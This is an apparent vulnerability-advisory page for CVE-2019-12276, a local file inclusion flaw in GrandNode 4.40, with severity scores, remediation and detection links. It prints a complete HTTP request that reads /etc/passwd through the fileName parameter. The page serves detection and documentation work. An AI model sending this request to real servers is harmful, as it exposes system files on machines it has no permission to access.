🔙 목록으로 돌아가기

CVE-2019-12276: GrandNode 4.40 - Local File Inclusion

TitleGrandNode 4.40 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the entire system.
RemediationA patch for this issue was made on 2019-05-30 in GrandNode 4.40.
CVSS Score7.5
EPSS Score0.91643
CVE IDCVE-2019-12276
CWE IDCWE-22
Tags cve cve2019 packetstorm lfi grandnode vkev vuln

🔍 Vulnerability Description

GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.

🌐 HTTP Request

GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1
Accept: */*
Accept-Language: en
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12276.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-12276.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A